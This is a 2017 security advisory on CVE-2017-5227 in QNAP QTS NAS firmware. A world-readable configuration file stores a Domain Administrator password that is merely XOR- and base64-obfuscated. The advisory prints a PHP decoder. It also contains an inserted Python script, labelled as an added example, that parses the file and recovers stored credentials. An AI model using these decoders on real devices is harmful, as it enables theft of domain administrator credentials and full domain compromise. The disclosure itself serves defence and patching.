QNAP QTS Domain Privilege Escalation Vulnerability

Name              Sensitive Data Exposure in QNAP QTS
Systems Affected  QNAP QTS (NAS), all models, all versions < 4.2.4
Severity          High 7.9/10
Impact            CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
Vendor            http://www.qnap.com/
Advisory          http://www.ush.it/team/ush/hack-qnap/qnap.txt
Authors           Pasquale "sid" Fiorillo (sid AT ush DOT it)
                  Guido "go" Oricchio (g.oricchio AT pcego DOT com)
Date              20170322

I. BACKGROUND

QNAP Systems, founded in 2004, provides network attached storage (NAS) and network video recorder (NVR) solutions for home and business use to the global market. QNAP also delivers a cloud service, called myQNAPcloud, that allows users to access and manage their devices from anywhere. QTS is the proprietary Linux-based firmware that runs on QNAP devices.

ISGroup (http://www.isgroup.biz/) is an Italian information security boutique. We found this 0day issue while supporting Guido Oricchio of PCego, a system integrator, in securing a QNAP product for one of his customers.

Responsible disclosure with QNAP: we contacted QNAP at their public security@ address and quickly escalated to their Security Researcher Myron Su over PGP-encrypted email.

Prior vulnerabilities in QNAP: https://www.qnap.com/en/support/con_show.php?op=showone&cid=41

Information to customers about the vulnerability is given in their bulletin ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113):

  QTS 4.2.4 Build 20170313 includes security fixes for the following vulnerabilities: Configuration file vulnerability (CVE-2017-5227) reported by Pasquale Fiorillo of the cyber security company ISGroup (www.isgroup.biz), a cyber security company, and Guido Oricchio of PCego (www.pcego.com), a system integrator.

The latest version of the software at the time of writing can be obtained from:

https://www.qnap.com/en-us/product_x_down/
https://start.qnap.com/en/index.php
https://www.qnap.com/

II. DESCRIPTION

The vulnerability allows a local QTS admin user, or any other low-privileged user, to read a configuration file that contains a weakly obfuscated Microsoft Domain Administrator password, if the NAS has been joined to a Microsoft Active Directory domain.

The affected component is the "uLinux.conf" configuration file, which is created world-readable and is used to store a Domain Administrator password. The admin user can read the file over SSH, which is enabled by default. Other users are not allowed to log in, so they have to exploit another component, such as a web application hosted on the NAS, to run arbitrary commands or read arbitrary files.

TL;DR: anyone able to read the uLinux.conf file, which is world-readable by default, can escalate to Domain Administrator if the NAS is a domain member.

III. ANALYSIS

QNAP QTS stores the "uLinux.conf" configuration file in a directory accessible by "nobody" and with permissions that make it readable by "nobody". If the NAS has been joined to an Active Directory domain, the file contains a Domain Administrator username and password in an easily decrypted format. In older versions of QTS the Domain Admin's password was stored in plaintext.

A) Config file readable by "nobody"

[~] # ls -l /etc/config/uLinux.conf
-rw-r--r--    1 admin    administ       7312 Dec 10 06:39 /etc/config/uLinux.conf

Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U, a TS-469L and a TS-221.

Read access to the file is granted to every local user, including httpdusr, the account used to run the web sites and web applications hosted on the NAS. This puts all the information contained in the configuration file at risk and is a violation of the principle of least privilege (https://en.wikipedia.org/wiki/Principle_of_least_privilege).

B) Weakly encrypted password in the configuration file

The Microsoft Active Directory admin username and password are stored in the file obfuscated with a simple XOR cipher and base64 encoded.
In this scenario, a local file read vulnerability can lead to full domain compromise, since an attacker can reuse the recovered credentials to authenticate against a Domain Controller with maximum privileges.

The password field in uLinux.conf has the following format:

User = <username>
Password = <base64>

e.g.:

User = Administrator
Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==

The "<base64>" value decoded is:

sid@zen:~$ echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C
00000000  03 03 00 00 01 01 06 06  07 07 04 04 23 23 20 20  |............##  |
00000010  21 21 26 26 27 27 24 24  43                       |!!&&''$$C|
00000019

Each byte XORed with \x62 gives the ASCII code of the plaintext character, e.g.:

\x03 ^ \x62 = \x61 (a)
\x00 ^ \x62 = \x62 (b)
...
\x24 ^ \x62 = \x46 (F)
\x43 ^ \x62 = \x21 (!)

The plaintext password is: aabbccddeeffAABBCCDDEEFF!

IV. EXPLOIT

The following code can be used to decode the password:

#!/usr/bin/php
<?php
// Usage: ./decode.php <base64 Password value taken from uLinux.conf>
if ($argc < 2) {
    fwrite(STDERR, "usage: {$argv[0]} <base64>\n");
    exit(1);
}
// Undo the obfuscation: base64-decode, then XOR every byte with the constant 0x62.
$obfuscated = str_split(base64_decode($argv[1]));
foreach ($obfuscated as $chr) {
    echo chr(ord($chr) ^ 0x62);
}
echo "\n";

e.g.:

sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
aabbccddeeffAABBCCDDEEFF!

V. VENDOR RESPONSE

The vendor released QTS 4.2.4 Build 20170313, which contains the proper security patch. At the time of this writing an official patch is available.

VI. CVE INFORMATION

MITRE assigned CVE-2017-5227 to this vulnerability; internally at QNAP it is referred to as Case NAS-201703-21.

VII. DISCLOSURE TIMELINE

20161212 Bug discovered
20170106 Request for CVE to MITRE
20170106 Disclosure to security@qnap.com
20170107 Escalation to Myron Su, Security Researcher at QNAP (fast!)
20170107 Details disclosed to Myron Su
20170109 Got CVE-2017-5227 from cve-assign
20170110 Myron Su confirms the vulnerability
20170203 We ask for updates, no release date from vendor
20170215 We extend the disclosure date as 28 Feb will not be met
20170321 QNAP releases QTS 4.2.4 Build 20170313
20170322 Advisory disclosed to the public
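The following Python script is an added example, not part of the original advisory or of QNAP's code. It reimplements in one place the decoder from section IV and the checks behind sections III.A and III.B: it parses "Key = Value" lines from a uLinux.conf-style text, reverses the base64 + XOR 0x62 obfuscation, shows that the very same operation re-obfuscates a value (the scheme is keyless and symmetric, so a reader of the file can also forge one), and flags the 0644 mode shown in the ls -l output. The section names and the keys other than User/Password in the embedded sample are constructed for illustration; the advisory does not describe the rest of the file's layout.

```python
import base64
import stat

# Constant single-byte key observed in the advisory (section III.B).
XOR_KEY = 0x62

# Constructed sample, NOT a real uLinux.conf: only the "User = " / "Password = "
# lines follow the format shown in the advisory; the section names and the other
# keys are placeholders for illustration.
SAMPLE_CONF = """\
[Sample Section]
Hostname = nas01
User = Administrator
Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==

[Other Section]
Enabled = TRUE
"""


def deobfuscate(b64: str) -> str:
    """Reverse the QTS scheme: base64-decode, then XOR every byte with 0x62."""
    raw = base64.b64decode(b64)
    return bytes(b ^ XOR_KEY for b in raw).decode("latin-1")


def obfuscate(plaintext: str) -> str:
    """The same XOR followed by base64. XOR with a constant is its own inverse,
    so there is no secret involved: this is obfuscation, not encryption."""
    raw = bytes(b ^ XOR_KEY for b in plaintext.encode("latin-1"))
    return base64.b64encode(raw).decode("ascii")


def parse_conf(text: str) -> dict:
    """Parse 'Key = Value' lines into {section: {key: value}}.
    Lines before any [section] header go under ''. Blank and '#' lines are skipped."""
    sections = {"": {}}
    current = ""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, {})
            continue
        # partition on the first '=' only: the base64 value itself ends in '=='
        key, sep, value = line.partition("=")
        if sep:
            sections[current][key.strip()] = value.strip()
    return sections


def find_domain_credentials(text: str) -> list:
    """Return (section, user, recovered password) for every section holding both keys."""
    found = []
    for section, keys in parse_conf(text).items():
        if "User" in keys and "Password" in keys:
            found.append((section, keys["User"], deobfuscate(keys["Password"])))
    return found


def world_readable(mode: int) -> bool:
    """True when the 'other' read bit is set, as for the 0644 mode in the ls -l output."""
    return bool(mode & stat.S_IROTH)


if __name__ == "__main__":
    import os
    import sys

    if len(sys.argv) > 1:
        # Real file given on the command line (e.g. /etc/config/uLinux.conf on a NAS).
        path = sys.argv[1]
        mode = os.stat(path).st_mode
        print(f"{path}: mode {stat.filemode(mode)}, world-readable={world_readable(mode)}")
        with open(path, encoding="latin-1") as fh:
            text = fh.read()
    else:
        text = SAMPLE_CONF
    for section, user, password in find_domain_credentials(text):
        print(f"[{section}] {user} : {password}")
```

Run without arguments it works on the embedded sample; run with a path it reports the file mode and the recovered credentials of every section that carries both a User and a Password key, which is the generalisation of the single-value decoder in section IV.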
VIII. REFERENCES

[1] Top 10 2013-A6-Sensitive Data Exposure
    https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure
[2] Access Control Cheat Sheet
    https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
[3] https://forum.qnap.com/viewtopic.php?t=68317
    20121213 User reporting that the password was stored in plaintext in a world-readable file
[4] https://www.qnap.com/en/support/con_show.php?cid=113
    QNAP Security Bulletin NAS-201703-21

IX. CREDIT

Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the discovery of this vulnerability.

Pasquale "sid" Fiorillo
web site: http://www.pasqualefiorillo.it/
mail: sid AT ush DOT it

Guido "go" Oricchio
web site: http://www.pcego.com/
mail: g.oricchio AT pcego DOT com

X. LEGAL NOTICES

Copyright (c) 2017 Pasquale "sid" Fiorillo

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without my express written consent. If you wish to reprint the whole or any part of this alert in any medium other than electronically, please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.